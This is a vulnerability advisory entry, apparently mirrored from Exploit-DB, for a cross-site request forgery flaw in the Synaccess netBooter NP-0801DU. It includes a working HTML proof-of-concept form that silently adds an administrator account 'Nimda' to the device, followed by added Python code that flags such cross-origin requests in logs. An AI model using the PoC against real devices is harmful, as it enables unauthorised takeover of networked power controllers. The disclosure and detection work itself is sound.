vendor: Unknown
by: Gjoko 'LiquidWorm' Krstic
N/A
CVSS
N/A
Cross-Site Request Forgery (Add Admin)
Unknown
CWE
Product Name: Unknown
Affected Version From: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Synaccess server
2018

Synaccess netBooter NP-0801DU 7.4 – Cross-Site Request Forgery (Add Admin)

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Title: Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)
# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
# Exploit Date: 2018-11-17
# Vendor: Synaccess Networks Inc.
# Product web page: https://www.synaccess-net.com
# Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)
# Tested on: Synaccess server
# CVE: N/A
# Advisory ID: ZSL-2018-5501
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php

# Desc: The application interface allows users to perform certain
# actions via HTTP requests without performing any validity checks
# to verify the requests. This can be exploited to perform certain
# actions with administrative privileges if a logged-in user visits
# a malicious web site.

<html>
  <body>
   <form action="http://10.0.0.19:8082/adm.htm" method="POST">
     <input type="hidden" name="add1" value="Nimda" />
     <input type="hidden" name="add2" value="123456" />
     <input type="hidden" name="add3" value="123456" />
     <input type="hidden" name="adm0" value="1" />
     <input type="submit" value="Gou" />
   </form>
  </body>
</html>
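
A detection-side view of the request above, as an added example that is not part of the original advisory: it classifies logged requests to `/adm.htm` that carry the PoC's `add1`/`add2`/`add3` fields by whether their Origin or Referer matches the Host header. The record layout (a dict with method, path, lower-cased headers and urlencoded body), the function names and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Path and field names are taken from the PoC form on this page.
ADMIN_PATH = "/adm.htm"
ADD_USER_FIELDS = {"add1", "add2", "add3"}


def source_host(headers):
    """host[:port] from Origin, else Referer; None if absent or 'null'."""
    value = headers.get("origin") or headers.get("referer")
    if not value or value == "null":
        return None
    return urlsplit(value).netloc.lower() or None


def classify(request):
    """Return 'ignore', 'same-origin' or 'cross-origin' for one logged request."""
    if request["method"] != "POST" or urlsplit(request["path"]).path != ADMIN_PATH:
        return "ignore"
    fields = parse_qs(request["body"], keep_blank_values=True)
    if not ADD_USER_FIELDS.issubset(fields):
        return "ignore"
    headers = request["headers"]
    src = source_host(headers)
    # An account-creating POST whose Origin/Referer is missing or names another
    # host did not come from the device's own admin page.
    if src is not None and src == headers.get("host", "").lower():
        return "same-origin"
    return "cross-origin"


# Constructed sample records (assumed log layout, not captured traffic).
DEVICE = "10.0.0.19:8082"
BODY = "add1=ops&add2=example-pw&add3=example-pw&adm0=1"
SAMPLES = [
    {"method": "POST", "path": "/adm.htm", "body": BODY,
     "headers": {"host": DEVICE, "origin": "http://" + DEVICE}},
    {"method": "POST", "path": "/adm.htm", "body": BODY,
     "headers": {"host": DEVICE, "origin": "http://pages.example"}},
    {"method": "POST", "path": "/adm.htm", "body": BODY,
     "headers": {"host": DEVICE}},
    {"method": "GET", "path": "/adm.htm", "body": "",
     "headers": {"host": DEVICE}},
]

if __name__ == "__main__":
    for record in SAMPLES:
        print(record["method"], record["headers"].get("origin"), classify(record))
```

The same comparison can be enforced by a reverse proxy in front of the device's management interface, rejecting the `cross-origin` class instead of only logging it.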